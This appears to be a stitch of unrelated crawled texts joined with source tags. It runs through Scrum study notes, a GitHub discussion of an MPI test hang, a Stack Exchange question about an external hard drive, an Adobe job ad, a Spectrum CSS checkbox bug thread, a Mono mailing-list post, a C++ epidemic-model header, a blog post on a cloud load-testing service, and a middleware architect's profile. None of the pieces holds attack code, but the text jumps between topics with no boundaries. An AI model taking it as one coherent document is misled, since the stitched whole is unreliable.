The Scrum Framework :
- The Scrum Framework consists of Scrum Teams and their associated events, artifacts, and roles as defined in the Scrum Guide.
- According to the Scrum Guide, the mandatory rules and principles of Scrum are the Scrum Roles, the Scrum Events, the Sprint Goal, the Product Backlog, the Sprint Backlog, the Increment, the Definition of Done, and monitoring progress at the Sprint and project levels. Everything else is a practice that can be employed within the Scrum framework; such practices are up to the team and the project and are not mandatory.

The Scrum roles :
- Product Owner
- Development Team (Developers)
- Scrum Master

The Scrum artifacts :
- Artifacts represent work or value, and provide transparency and opportunities for inspection and adaptation.
- Artifacts are defined by Scrum and designed to maximize transparency of key information so that everybody has the same understanding.
- Product Backlog
- Sprint Backlog

The Scrum events :
- Sprint Planning
- Daily Scrum
- Sprint Review
- Sprint Retrospective
- The Sprint is the container for all other events.
- Events present an opportunity in the Sprint for something to be inspected and adapted.
- Events are designed to enable transparency and inspection.
- There are five events in total in the Scrum framework: the Sprint, Sprint Planning, the Daily Scrum, the Sprint Review, and the Sprint Retrospective.
- Four events of inspection and adaptation:
1. Sprint Planning
2. Daily Scrum
3. Sprint Review
4. Sprint Retrospective
- All four of these Scrum events are feedback loops, i.e. inspect-and-adapt opportunities.
Although the Sprint is an event, its role is to be a container for the other events. Product Backlog refinement is a continuous activity and is not a feedback loop.

Sprint Planning :
- Sprint Planning is a time-boxed event of eight hours or less that starts a Sprint.
- Sprint Planning is a mandatory event of Scrum and a feedback loop in which team members inspect the Product Backlog and select enough work to develop during the Sprint. It is conducted at the beginning of each Sprint.
- Sprint Planning is time-boxed to a maximum of eight hours for a one-month Sprint. For shorter Sprints, it is usually shorter.

Sprint Planning purpose :
- Sprint Planning serves to inspect the work from the Product Backlog that is most valuable to be done next, and to design this work into the Sprint Backlog.
- The outputs of Sprint Planning are the Sprint Goal and the Sprint Backlog, which itself contains the selected Product Backlog Items and their related tasks.

Sprint Planning participants :
- The Scrum Team.
- The Sprint Goal is created through the collaboration of all Scrum Team members.

Sprint Planning practice :
- In Sprint Planning, usually only enough tasks are defined for the early days of the Sprint; other tasks emerge during the Sprint as the Development Team learns more about the work, and new tasks are added during the Daily Scrum.
- Creating the Sprint Backlog is collaborative work done by the Development Team members during Sprint Planning, not before or after it.
- During Sprint Planning, the Sprint Backlog should be refined enough that the Development Team can create its best forecast of what it can do and start the first several days of the Sprint.
- Sprint Planning answers two questions:
1. What can be delivered in the Increment for this Sprint?
2. How will the required work be achieved?
- The three inputs to the Sprint Planning meeting are:
1. Product Backlog
2. Projected development capacity
3. Past development performance
OPCFW_CODE
BUG: fix elusive MPI runtime error in tests

closes #406

Finally figured it out. Our MPIBackend unit tests use a reduced network model to speed things up. This revealed a rare edge case that only shows up on machines with a large number of logical cores, where more MPI threads were created than there were neurons contributing to the dipole. When NetworkBuilder().aggregate_data() then tried to add up and reduce its NEURON data instances across both intra-rank and inter-rank neurons, it hung due to a mismatch between h.Vector() sizes.

@cjayb All the tests on your M1 Mac should pass after this PR. Feel free to give it a try if you feel inspired!

I did, and they do! Amazing sleuthing @rythorpe, tip of the old hat to you, Sir!

Codecov Report
Merging #545 (1995230) into master (52ee292) will decrease coverage by 0.01%. The diff coverage is 92.85%.

@@            Coverage Diff             @@
##           master     #545      +/-   ##
==========================================
- Coverage   90.24%   90.23%   -0.02%
==========================================
  Files          20       20
  Lines        3988     3992       +4
==========================================
+ Hits         3599     3602       +3
- Misses        389      390       +1

Impacted Files                  Coverage Δ
hnn_core/network_builder.py     93.83% <90.90%> (-0.27%) :arrow_down:
hnn_core/network.py             92.16% <100.00%> (ø)
hnn_core/parallel_backends.py   82.36% <100.00%> (+0.04%) :arrow_up:

Very cool! What was the reason that the test was failing intermittently? Is there some non-deterministic part in the rank assignment?

> What was the reason that the test was failing intermittently?

I'd call this a consistent issue for those of us with more than 6 logical cores. The oversubscription test creates 1.5x threads; for my 8 cores this is 12.
There are 3 x 3 == 9 grid points in the test network, each with 2 pyramidal cells that contribute to the aggregate dipole moment. The gid assignment starts by looping over cells, which 'run out' at 18; that leaves 24-18==6 threads without a cell that contributes, which chokes the post-simulation reduction operations. Sound right @rythorpe ? The CI tests run on fewer than 6 cores, hence no problem.

Yes, that's exactly it!

Looks good! I'm trying to enable auto-merge ... will see if I can make it work on this PR

Thanks @rythorpe !!! 🥳 This certainly deserves a celebration
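The core-count arithmetic above can be sketched as a quick back-of-the-envelope check. All names here are illustrative (not part of hnn-core), and 16 logical cores is an assumption that reproduces the 24 oversubscribed threads and 6 idle ranks quoted in the thread:

```python
def idle_ranks(logical_cores, oversubscribe=1.5, grid_points=9, cells_per_point=2):
    """Count MPI ranks that receive no dipole-contributing cell."""
    n_threads = int(logical_cores * oversubscribe)
    n_cells = grid_points * cells_per_point  # 3 x 3 grid, 2 pyramidal cells each = 18
    return max(0, n_threads - n_cells)

print(idle_ranks(16))  # -> 6 ranks with no cell: the reduction hangs
print(idle_ranks(4))   # -> 0: CI machines with few cores never hit the bug
```

Any machine whose oversubscribed thread count exceeds the 18 cells in the reduced test network would hit the hang, which is why it looked machine-dependent rather than intermittent.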
GITHUB_ARCHIVE
HDD working on Mac but asks to be formatted on PC

I have a 1TB Toshiba external HDD, 2 years old. A few days ago it suddenly stopped showing up on my PC. Whenever I connect it, the system asks if I wish to format the HDD and I cannot access my years of stored data. Surprisingly, if I connect it to my Mac, it shows up and is even accessible. But the Mac is in the office and I cannot waste time recovering data there. How do I remedy this issue, and what's the cause of it? I believe some sectors on my HDD may have failed. Any suggestions for a way to recover my data? I can format the disk once the data is recovered and see if it still works.

Your data can't be that important if you won't 'waste time' on your easiest recovery method.

I would prefer not to work in the office. Not to mention the fact that we have a strict data confidentiality policy, so me connecting my HDD to the office Mac could be counterproductive. Plus, my Mac doesn't have nearly enough space to recover everything.

Try Paragon NTFS. Paragon NTFS effectively solves the communication problems between the Mac system and NTFS, providing full read and write access to Windows NTFS partitions under OS X.

@Davidenko You've got it backwards. The drive works for the OP on a Mac, but not on Windows.

Honestly, step 1 is BACKUP THAT DATA. If this is your only copy and something funny is happening, you need to back up everything while it's still retrievable, and from here on out, always keep more than one backup of information; single points of failure are the biggest cause of data loss in the world. From there, try to run chkdsk or repair tools on the HDD in question. There are plenty of tools to check/fix HDD booting issues.

I would suggest taking that hard drive and an external hard drive to the office. Copy the data from the dying hard drive to the external hard drive. Once all the data is safely on the external hard drive, discard the dying hard drive, purchase another, then move the data back onto it at home.
It's possible that the partition is damaged, or that it just can't be read from Windows for some reason. If the Mac is able to mount it properly, Linux probably will as well. You can try booting from a Linux live CD and moving the data to a different drive. Once you get all the data copied to another place, test the drive using the manufacturer's diagnostics tool. If it tests in good health, you can reformat and use it again.

If it didn't have enough power to operate, then Windows wouldn't be offering to format it. Windows offers to format it because it doesn't recognize the filesystem as FAT or NTFS.
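A rough sketch of the live-CD route suggested above. The device name /dev/sdb1 and the mount points are placeholders, so check the `lsblk` output first, and keep the drive mounted read-only until the data is safely copied:

```shell
lsblk -f                                   # identify the drive and its filesystem
sudo mkdir -p /mnt/rescue /mnt/backup
sudo mount -o ro /dev/sdb1 /mnt/rescue     # read-only: back up before any repair
rsync -a /mnt/rescue/ /mnt/backup/         # copy everything to another drive
sudo umount /mnt/rescue
sudo ntfsfix /dev/sdb1                     # basic NTFS consistency check/fix (ntfs-3g)
```

If `ntfsfix` can't repair the partition, the data is still safe in the backup copy and the drive can simply be reformatted after the manufacturer's diagnostics.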
STACK_EXCHANGE
Changing the world through digital experiences is what Adobe’s all about. We give everyone from emerging artists to global brands everything they need to design and deliver exceptional digital experiences! We’re passionate about empowering people to create beautiful and powerful images, videos, and apps, and transform how companies interact with customers across every screen. We’re on a mission to hire the very best and are committed to creating exceptional employee experiences where everyone is respected and has access to equal opportunity. We realize that new ideas can come from everywhere in the organization, and we know the next big idea could be yours! Adobe is bringing together the best-in-breed experiences across Adobe’s Creative Cloud, Document Cloud, and Marketing Cloud into an end-to-end platform that enables people to get more done together. Our cloud platform supports these experiences with a set of services that will reflect a common user model, will support service business models, and will rely on secure and scalable technology. Our team is re-inventing how these offerings come together as a single source of truth for Adobe customers, and we are looking for a product manager to help define and build the next-generation platform and integrations that will be the foundation of our partner and developer ecosystem. The Foundation team offers an impressive suite of developer efficiency products used across Adobe, and they are the backbone to millions of customer experiences. However, there’s always room for improvement. Adobe engineers struggle to discover these products and are largely left to integrate and manage it all themselves. They also must keep pace with ever-evolving practices for ensuring secure, reliable, resilient, and efficient software. 
We believe that we can better support Adobe engineers by connecting our products more deeply across important engineering workflows and by raising the level of abstraction to reduce the burden of owning software and infrastructure across multiple clouds. We are seeking a senior product manager who will help drive the next evolution of our developer productivity products. Your mission is to simplify and accelerate the software development experience at Adobe. You will deeply understand and triangulate across team needs, product analytics, and external industry innovation to offer outstanding experiences to Adobe engineers. Within Foundation Product Management this is a cross-cutting function, and we're on a mission to raise the level of product thinking across the organization. This is a unique opportunity for you to help shape our product management practices and partner closely with engineering teams through this evolution.

What you'll do
- Drive product vision and strategy for developer efficiency offerings and align with partners
- Establish our developer experience principles: how our products should feel to developers and the core attributes that we want them to embody
- Help evolve Platform Engineering's customer engagement model, communication strategy, support strategy, and prioritization, planning, and roadmapping practices
- Deeply understand, document, analyze, and synthesize our developer and partner community needs, and create compelling business cases for product development
- Collaborate with engineering, product managers, architects, and other technical leaders on the execution and delivery of new capabilities
- Manage internal product requests from business owners, engineering leaders, and other cross-functional partners
- Develop release communication plans, identify early adopters, and drive pilots to ensure rapid adoption of new platform offerings
- Work cross-functionally with app teams, like Lightroom, Adobe Experience Manager, or Sensei, and with other platform teams within the CTO's organization, to build and execute on the roadmap

Needed for success
- 7+ years of full-time work experience
- Strong analytical, organizational, and problem-solving skills to coordinate complicated projects
- Demonstrated passion for developer productivity and developer experience
- Ability to manage in an environment of ambiguity with diverse partners
- Proven track record of independently driving initiatives end-to-end
- Articulate and persuasive while able to listen and incorporate the perspectives of others
- A healthy blend of deep technical knowledge with a customer-focused attitude and empathy
- Ability to write simple applications (Java, Golang, Node, Ruby) to demo workflows to developers or showcase unmet use cases
- BA/BS in Computer Science, Engineering, Mathematics, Statistics, Business, or equivalent
- Comfortable applying a combination of qualitative and quantitative methods to define success, and able to problem-solve without perfect metrics
- Experience in product management or software engineering with a passion for developer platforms & ecosystems
- An orientation for execution with a strong process and metrics focus
- Strong verbal, presentation, and written communication skills, as you'll be interacting with product and engineering leaders at various levels
OPCFW_CODE
Checkbox label position 1px/2px too low

Description
Checkbox label is 1px (desktop) / 2px (mobile) lower than the design.

Steps to reproduce
Go to https://opensource.adobe.com/spectrum-css/components/checkbox/
Screenshot: checkbox
Compare with UI kit

Expected behavior
Label should be 1px higher (desktop) or 2px higher (mobile).

Screenshots (red is design)
desktop:
mobile:

Environment
Spectrum CSS version:
Browser(s) and OS(s):

Additional context
Came across while doing React review. Not sure if this is some rendering issue or not :( sorry if this is not relevant!

FYI, looks even more off in Firefox and Edge on both macOS and Windows. More like it's bottom-aligned. Here's a FF mac screenshot:

Thanks @devongovett for the feedback. We did a deeper dive into this, and it turns out this 1px rendering bug comes from "browser jiggering" based on the rendering engine. TL;DR: different rendering engines place the baseline differently. I compared a couple of browsers, and I might have a potential solution in this commit: https://github.com/adobe/spectrum-css/pull/412/commits/2d6b43ae1a1dca22992df4e1a98af7c6ebbdd3be Here is a comparison of how a couple of evergreen browsers might render it differently. We may have to discuss whether it is worth using a "1.49" line-height fix. A couple of solutions point in the direction of just letting this be. Maybe @NateBaldwinDesign might have some good feedback for this situation. Screenshot:

@bernhard-adobe so it sounds like setting line-height: 1.49 is a hack to fix the issue in Firefox and Edge, and without it, the label is 1px too low. Personally, I say that's an acceptable solution and I would accept the PR with that change. @GarthDB and @jianliao, your thoughts? Let's get feedback on this by EOD so we can merge.

@bernhard-adobe this is pretty crazy. I am fine with changing the line height in those browsers to account for the problem this causes.
Considering this is a browser-specific rendering issue w/r/t line heights, I assume this means all components in Firefox and Edge would have this same problem? If so, it seems this is more than just a Checkbox-related issue. Here's where my head is at on this: for Checkbox and all components whose type is derived from Body, the line-height is defined at 1.5x the font size in Latin scripts. A few questions that arise in my mind are: Would it be better to provide line-heights as multiplier (unitless) values rather than their resolved pixel values (i.e. 1.3, 1.5, 1.7)? Would this provide any help regarding these rendering issues? If this is a universal rendering issue that appears at other type sizes, is there a broader rule we should apply, such that for Firefox & Edge, all line heights = line-height - 0.01?

Correct, this might appear in other components as well. To answer your questions: Which multiplier would you like to use? I tried that with calc, but the line-heights I tried it with were px-based and that didn't fix the issue. Using the resolved pixel values worked only in this scenario.

That is super strange. Does that solution work at different scales too (e.g. large scale)? What if you zoom in to > 100%? I'd be wary of setting exact numeric values like that...

@bernhard-adobe Still appears too low to me on master...

Thanks for providing the screenshot @devongovett . May I ask what browser you are using, whether your screen is Retina-based, and which operating system?
I have run the tests again on macOS Mojave 10.14.5 (18F203) on a non-Retina Apple Thunderbolt screen (2011). Master at: https://github.com/adobe/spectrum-css/tree/4747bc456053a7ad5bb84a29385f5d00a6029681

Browsers from left to right:
Google Chrome Canary Version 81.0.3999.0 (Official Build) canary (64-bit)
Firefox Version 71.0 (64-bit)
Safari Version 12.1.1 (146<IP_ADDRESS>.1)
Microsoft Edge on macOS Version 79.0.309.47 (Official build) Beta (64-bit)
Microsoft Edge Version 42.17134.1038.0 in VMware Fusion on Windows 10 1803, Microsoft EdgeHTML 17.17134

Here are the screenshots: notice the correct gap of 1px between the bottom of the checkbox and the label. The only difference I noticed is in Edge in VMware Fusion, where a very subtle anti-aliasing can be seen at the bottom of the label. This could, however, be a false positive, as I am running this in a virtual machine on my Mac and VMware Fusion might scale the DPI of my Thunderbolt screen incorrectly for Windows. There are a couple of settings in VMware Fusion that allow further customization.

Those all look baseline-aligned to me, not centered. You're seeing the same as me. We have made this adjustment in react-spectrum to vertically align the labels for checkbox/radio/status light/switch: https://github.com/adobe/react-spectrum-v3/pull/138 This should be discussed in the new year.

OH, I see the issue. @lazd and I worked to align those items consistently on the baseline, as we thought that was the correct look and feel. Double-checking our Spectrum specs at https://spectrum.corp.adobe.com/page/radio-button/, it appears that those labels are a bit higher than we expected. I have corrected this in #458.
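For reference, the line-height workaround debated in this thread amounts to something like the following; the selector name is illustrative, and the actual Spectrum CSS class names may differ:

```css
/* Workaround sketch: 1.49 instead of the nominal 1.5 line-height.
   Some engines round the baseline position down, dropping the label
   1px; shaving 0.01 off the multiplier compensates for it. */
.spectrum-Checkbox-label {
  line-height: 1.49;
}
```

Whether the 0.01 offset should be applied globally to all Body-derived type, as discussed above, remains the open question.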
GITHUB_ARCHIVE
[Mono-dev] minimal mono embedding profile - hpc twist
kumpera at gmail.com
Wed Oct 3 18:57:25 UTC 2012

On Wed, Oct 3, 2012 at 1:59 PM, sebastian <sebastian at palladiumconsulting.com> wrote:
> We are investigating running mono to enable C# as a computing language in
> an HPC framework. There are many strategies for getting maximum speed out
> of a program, and one of them involves running a single process per CPU
> core and pinning it there. (There are reasons this is good and bad -- I
> don't want to debate that at the moment.)
> In this case we would want the mono we loaded to be as "small" as possible,
> in some sense that is probably different from what "small" means on a mobile
> device. We are happy to consume tons of memory if necessary, but would want
> as few threads as possible. If possible, only 1, with the garbage collector
> "stopping the world" if necessary. Are there switches or diagnostics to
> understand or control this behavior? (Obviously some common programming
> paradigms, such as the task pool, are discouraged in this scenario, as we
> wouldn't want a thread pool spun up.)

Mono only uses one extra thread, for finalization. Making all code that runs on the finalizer thread happen on the main thread would be challenging.

> To get even more exotic, and I suppose this would require a patch to mono
> itself, we would want the memory allocation to be customized to take
> advantage of the NUMA on the machine, allocating only memory which is
> advantageous to the socket on which our current process is running.

Can't a numactl wrapper do all of this?

> Finally, we may want to tweak the parameters sent to the LLVM compiler to
> optimize for runtime speed, even at the cost of very slow compilation.

Tweaking LLVM parameters requires changing mono's source code and pretty much voids any guarantees that the resulting code will work. A lot of LLVM optimizations for some reason produce bad code when used with mono. Zoltan can better explain this, I guess.
> Where do we start in understanding the above changes and whether they are
> already supported? The documentation for LLVM and the garbage collectors is
> excellent at describing the high-level approach, but I am at a bit of a
> loss when understanding how to tweak the details.

For such a thing, you need to dig into the runtime source code, as those internals are not documented.
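As for the numactl suggestion above, the per-socket pinning can be done entirely outside the runtime. A sketch (the node and core numbers are illustrative, and `app.exe` is a placeholder):

```shell
# Run one mono process pinned to NUMA node 0, allocating memory only there
numactl --cpunodebind=0 --membind=0 mono app.exe

# Or pin a process to a single logical core with taskset
taskset -c 3 mono app.exe
```

A job launcher would typically run one such command per socket or core, matching the one-process-per-core strategy described in the original question.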
OPCFW_CODE
#ifndef _CRISP_HPP
#define _CRISP_HPP

#include <vector>
#include <iostream>
#include <random>
#include <tuple>
#include <cmath>

#include "distribution.hpp"

using namespace std;

// This enum captures the two test outcomes
enum TestOutcome { Negative = 0, Positive = 1 };

// This class stores all the outcome information
typedef tuple<int,int,int> OutcomeTuple;

class Outcome {
private:
    int _individual;
    int _time;
    TestOutcome _outcome;

public:
    Outcome(int u, int t, TestOutcome o) : _individual(u), _time(t), _outcome(o) {}
    Outcome(const OutcomeTuple &o) : Outcome(get<0>(o), get<1>(o), get<2>(o)==0 ? Negative : Positive) {}

    int getIndividual() { return _individual; }
    int getTime() { return _time; }
    TestOutcome getOutcome() { return _outcome; }
};

// This class stores all the contact information
typedef tuple<int,int,int,int> ContactTuple;

class Contact {
private:
    int _fromIndividual;
    int _toIndividual;
    int _time;
    int _count;

public:
    Contact(int u, int v, int t, int count) : _fromIndividual(u), _toIndividual(v), _time(t), _count(count) {}
    Contact(const ContactTuple &c) : Contact(get<0>(c), get<1>(c), get<2>(c), get<3>(c)) {}

    int getTargetIndividual() const { return _toIndividual; }
    int getSourceIndividual() const { return _fromIndividual; }
    int getTime() const { return _time; }
    int getCount() const { return _count; }
};

ostream &operator<<(ostream&, Contact const&);

template<typename T> using array1 = vector<T>;
template<typename T> using array2 = vector<array1<T>>;
template<typename T> using array3 = vector<array2<T>>;
template<typename T> using array4 = vector<array3<T>>;

class PopulationInfectionStatus {
protected:
    // Total number of individuals S
    int _noIndividuals;
    // Total number of time steps T
    int _noTimeSteps;

    // Random number generator
    random_device _rd;
    mt19937 _gen;

    // Contacts data
    vector<vector<vector<tuple<int,int>>>> _contacts;
    vector<tuple<int,int>> _empty;

    inline const vector<tuple<int,int>>& _futureContact(int u, int t) const {
        return t>=0 && t<_noTimeSteps ? _contacts[u][t] : _empty;
    }
    inline const vector<tuple<int,int>>& _pastContact(int u, int t) const {
        return t>=1 && t<=_noTimeSteps ? _contacts[u][t-1] : _empty;
    }

    // Test outcomes for all people
    vector<vector<Outcome>> _outcomes;

    // Distribution of the length of the susceptible phase
    Geometric _qS;
    // Distribution of the duration of exposure
    Distribution _qE;
    // Distribution of the duration of infectiousness
    Distribution _qI;

    // False-negative rate of the test outcome
    double _alpha;
    // False-positive rate of the test outcome
    double _beta;

    // Cached value of p0
    double _p0;
    // Cached value of p1
    double _p1;
    // Cached value of log(1-_p1)
    double _log1MinusP1;

    // Maximum & minimum duration of exposure and infectiousness
    // (depends on the discrete distributions qE and qI)
    int _minExposure;
    int _minInfectious;
    int _maxExposure;
    int _maxInfectious;

    // Advance the whole model by one time step, adding new contacts and tests
    virtual void _advance(const vector<ContactTuple>& contacts, const vector<OutcomeTuple>& outcomes, bool updatePrior) = 0;

public:
    PopulationInfectionStatus(int S, int T,
                             const vector<ContactTuple>&, const vector<OutcomeTuple>&,
                             Distribution& qE, Distribution& qI,
                             double alpha, double beta, double p0, double p1, bool=false) :
        _noIndividuals(S),
        _noTimeSteps(T),
        _gen(_rd()),
        _contacts(_noIndividuals),
        _outcomes(_noIndividuals),
        _qS(p0),
        _qE(qE),
        _qI(qI),
        _alpha(alpha),
        _beta(beta),
        _p0(p0),
        _p1(p1),
        _log1MinusP1(log(1.0-p1)),
        _minExposure(qE.getMinOutcomeValue()),
        _minInfectious(qI.getMinOutcomeValue()),
        _maxExposure(qE.getMaxOutcomeValue()),
        _maxInfectious(qI.getMaxOutcomeValue()) {
    }

    PopulationInfectionStatus(const PopulationInfectionStatus& other) = delete;
    PopulationInfectionStatus& operator=(const PopulationInfectionStatus&) = delete;

    // Advance the whole model by one time step, adding new contacts and tests
    void advance(const vector<ContactTuple>& contacts, const vector<OutcomeTuple>& outcomes) {
        return _advance(contacts, outcomes, true);
    }

    // Get the posterior marginal distributions P(z_{u,t}|D_{contact}, D_{test})
    virtual array3<double> getMarginals(int N=0, int burnIn=0, int skip=0) = 0;

    // Sample posterior marginals P_{u,t}(z_{u,t}|D_{contact}, D_{test})
    virtual array3<int> sample(int N, int burnIn=0, int skip=0) = 0;
};

#endif
STACK_EDU
It all started off with such a simple idea: we had a client, their site was not performing well, so we started load testing. Now, we didn't have LoadRunner or any other expensive load testing solution to hand, so we opted for a web-based system instead. The system ran really well; in fact it did exactly what we wanted (albeit with a slightly chunky interface), and an intellectual challenge was born: surely it must be easy as pie to write a script that will zombie a bunch of servers in the cloud and point them at a target... an ethical DDoS.

So Loadzen was born, as a Python shell script and some cobbled-together RPC code. It was only after it actually worked, and was surprisingly effective, that we thought about taking it to market, and so the long road started to making it market-worthy. As this is a technical blog for technical people, let's talk about what it does under the hood...

The whole system runs off a three-tier architecture. This separation is essentially so that the website acts as a client to the job server, ensuring the machinery that manages and generates tests is fully separated and isolated from the business end. We can bring down the site and the job server will continue running (and retain your results). The job server will spawn generators as needed to meet the specific load requirement of the test being run at that moment.

But that's not all: the system actually uses a single thread for each "virtual user". Given we know how many threads any specific generator can support, we simply meter out accordingly; this way we can load-share multiple tests on the same load generators, with some processes running one set of test scenarios while others run a completely different test. This ensures maximum utilisation of the systems running at that moment (they're expensive!) and also ensures we're not just spawning a ton of new servers for each test.
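The thread-per-virtual-user metering described above can be sketched in plain Python. The wave barrier, jitter range, and all names here are illustrative, not Loadzen's actual code:

```python
import random
import threading
import time

def run_wave(n_users, scenario, jitter=(0.0, 0.02)):
    """Run one 'wave' of virtual users, one thread per user.

    A Barrier makes every user start the wave at the same moment, and a
    random per-step delay varies each user's pace through the scenario,
    simulating more realistic traffic.
    """
    barrier = threading.Barrier(n_users)
    elapsed = [0.0] * n_users

    def virtual_user(idx):
        barrier.wait()                       # all users start together
        for step in scenario:
            delay = random.uniform(*jitter)  # per-user 'drunken' step rate
            time.sleep(delay)
            elapsed[idx] += delay
            step()                           # e.g. issue an HTTP request

    threads = [threading.Thread(target=virtual_user, args=(i,)) for i in range(n_users)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(elapsed) / n_users            # averaged result for the job server

# Hypothetical scenario of three no-op "requests":
avg_time = run_wave(4, [lambda: None] * 3)
```

A real generator would of course multiplex many such waves from different tests across its thread budget and report the averages back over RPC.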
This is the basic architecture of the system at the highest level, but there are a few cool little tricks in the overall architecture that we'll get into later as we discuss the feature set. The standard workflow for a load test is:
- Identify your use cases
- Create scenarios for those use cases
- Determine the 'mix' of the use cases (e.g. 20% of visitors will buy something, 50% will bounce, and 30% will just browse or search)
- Set up the test and the load maximum
- Run the test

Loadzen does all of the above. The load generators will automatically scale out the 'mix' of tests based on the growth rate of the test curve, they will act in complete lock-step to ensure that each 'wave' of users starts at the same time, and they will strive to introduce some realistic behaviour by running the virtual users at various stages of 'drunkenness', varying their step rate through a scenario randomly so that we simulate more realistic user loads. The load generators will then record and average out each wave and report the data back to the job server, which stores it and makes it available to a client.

The load generators and the job server both run Python with Pyro RPC. The reason for this choice? Complete object transparency and interoperability between client and server, so that load generators have access to job server functions and job servers can pass test objects to load generators with a single function call and no translation layer. This is a little fiddly, but in the end it offers us the ability to just code without worrying about data types and formatting errors. Both the job server and the load generators run as instances in Amazon EC2 and are controlled using the rather awesome Boto library for AWS. The website is written in Django with MySQL, on a shiny fat server provided by the good folks at Media Temple. Probably the most interesting part of the website is the real-time results and control feed that is spun up every time a test is started.
This is actually a real-time push feed from the job server that uses a bastardisation of Socket.IO and a Python event server called Tornado (from the good folks at FriendFeed), all backed by an infrastructure queue powered by RabbitMQ and Pika. The actual infrastructure for the site looks like this when we introduce these systems back in (and to think, all of this effort just so you get some shiny animations and a graph on a screen!):

Can I just say this now: I love RabbitMQ. I have fallen in love with real-time systems thanks to setting this up; it's amazing how your viewpoint changes when you start thinking in terms of queues, channels, and processors. When this feed was set up, we briefly considered completely re-tooling the system to have a full-blown RabbitMQ back-end to power ALL of the things. Pragmatism (thankfully) won out. By running a separate Tornado server to handle the push feed, we again managed to decouple everything: the thing that manages the transport is decoupled from the web client, which is decoupled from the work generator, ensuring we can work on each independently and not have a monolithic code base.

Making it easy to use

The day before launch (I really shouldn't be admitting this), I wrote the Chrome extension client that made scenario creation MUCH easier than what was originally built into the website (although the manual wizard still had to be built to pave the way for other clients). It's a massive bit of kit that works but could always be made better. One of the key things learnt from this exercise is deciding when to make something work and when to make something beautiful. We all want to code stunning software and have great code that is well architected, but if you want to get something out the door, you need to make the pragmatic choice to say "earmark it for the next build", and iterate and improve as you go.

At the same time, we learnt to try to identify those bugs that seem niggling but that you know will turn into cancerous, nasty, evil blobs you have to work around because you were too lazy to tackle the problem head on.

Anyway, I hope you guys enjoy load testing with Loadzen! Happy coding (and testing),
Infrastructure Architect @ Nationwide Building Society
Bachelor's Degree, Structural Engineering @ The University of Manchester

I am an integration and data architect with more than 15 years' experience designing and implementing integration solutions founded on SOA principles, using technologies such as ESB (IBM WMQ, WMB/IIB, IBM DataPower), Web Services (SOAP, RESTful), and Java/JEE, across a range of industry verticals such as banking (Barclays Bank, HSBC Bank and Lloyds Bank) and logistics (TNT Plc). In the application and infrastructure integration space, I have extensive experience of the full project design lifecycle, having been engaged on many projects from requirements gathering, analysis and design elaboration, design documentation, and physical implementation through to delivery into production and support. In the data integration and analytics space, I have recent relevant interests in the entire Big Data infrastructure framework, ranging from the Hadoop ecosystem (HDFS, YARN, MapReduce, Flume, Kafka, Storm, Sqoop, etc.) to analytical engines such as Spark.
Summary of areas of expertise and interests
• WebSphere MQ Versions 5.3, 6.0, 7.1, 7.5 and 8.0
• WebSphere MQ MFT, Sterling Connect:Direct
• WebSphere Message Broker Version 5/6/7/8, IBM Integration Bus 9.0
• WebSphere DataPower XB62, ITCAM
• Web servers (WebSphere Application Server, Apache, Tomcat)
• Web service methodology/standards (SOAP, RESTful, Apache Axis2, WS-*)
• Enterprise Java 8 – Java EE, JMS, JDBC, SQL, ESQL, XML, SOAP
• SOA service design patterns, application design patterns
• Object-oriented analysis & design (OOAD)
• Architecture design methodologies and notation – UML, BPMN
• Unix, Linux, AIX, zOS, AS400, Windows
• Networking, TCP/IP, firewalls, load balancers, PKI (SSL)
• Hardware clustering – VCS, PowerHA
• Unix shell scripting, Python 3.0
• Some exposure to Scala
• Working knowledge of Enterprise Architecture methodologies TOGAF, SysML and ArchiMate
• Strong knowledge of the Hadoop ecosystem (HDFS, YARN, MapReduce, Flume, Kafka, Spark, Sqoop)

Messaging Middleware Technical Architect @
My main responsibilities in this role consisted of designing, implementing and supporting the entire messaging infrastructure of TNT. This infrastructure comprises the following technology offerings: IBM MQ (Versions 6.0, 7.1 and 7.5), IBM WMB (Versions 7 and 8), IBM Integration Bus (IIB) Version 9, FTP servers, BMC QPASA, IBM DataPower XB62, etc. In this capacity, I was routinely involved in design reviews of new services, deployment of the designed artifacts in all environments including production, and supporting and troubleshooting the various environments including production. I was also involved in the mentoring of and knowledge transfer to other team members.
From August 2014 to August 2015 (1 year 1 month)

Middleware Architect @
In this role, I had two main responsibilities. Firstly, I was in charge of designing a new architectural landscape for the adoption and deployment of IBM Integration Bus Version 9.0.
This entailed performing a thorough analysis and review of the existing WebSphere Message Broker Versions 6 and 7 infrastructural estate, reviewing the new IIB Version 9 product, producing detailed design and documentation of the proposed IIB 9 platform, and developing installation and administration scripts for building and administering the platform. I also developed migration plans for the migration of the WMB 6 and WMB 7 estate to the proposed IIB 9 platform. In my other role, I was the key messaging architect responsible for developing a new payment infrastructure for the corporate banking division of the bank. This entailed liaising with the project team (business analysts, application system architects, project managers, etc.) to gather and clarify requirements, and designing, implementing and testing the solutions using technologies such as WMQ 7.5, WMB 7, WAS 8, CICS, PKI, JMS, Apache Tomcat and Connect:Direct.
From October 2013 to July 2014 (10 months)

Middleware Architect @
As a middleware integration architect, I was responsible for designing the middleware infrastructural backbone using WMQ 6, WebSphere DataPower, WMB 6 and SonicESB for integrating a number of key business applications, such as the payment system and the internet banking system. This entailed designing and building a highly available and resilient WMQ interface to SWIFT using Veritas Cluster Server (VCS), and building connectivity to various other back-end systems. I also designed and built a new WMB 6 broker environment, which was to be used as the main non-functional testing (NFT) environment.
From May 2013 to September 2013 (5 months), Halifax, United Kingdom

Middleware Architect @
My main role during this assignment was to serve as the integration architect for designing and implementing an Enterprise Service Bus (ESB) infrastructure using the IBM products WMQ 6, WMB 6 and WAS to support a number of key business systems such as trading systems, payment systems, and risk and fraud management systems.
This infrastructure extended across a number of hardware platforms (Windows, AIX, Sun Solaris, Linux, mainframe), across multiple data centres and national boundaries, and supported connectivity to external organizations. The WMQ infrastructure consisted of a set of queue managers built on VCS hardware clustering technology, coupled with WMQ clustering for workload balancing and high availability of the entire infrastructure. On the message broker application development front, I was involved in the design, implementation and deployment into production of a number of WMB message flows in ESQL, which exposed web services hosted within the broker domain using the secured SOAP transport and TCPIP nodes as the entry point into the domain. These were incorporated into two key business applications, VisionPlus and Falcon. I also developed a number of administrative message flows for the broker domain – a message flow for determining the responsiveness of an execution group/broker by the load balancer, and a monitoring message flow for saving accounting and monitoring messages into a database. I developed a middleware object documentation standard using Microsoft Visio, which has now been adopted across the department as the main documentation format for middleware documentation.
From August 2011 to February 2013 (1 year 7 months)

Senior Middleware Specialist @
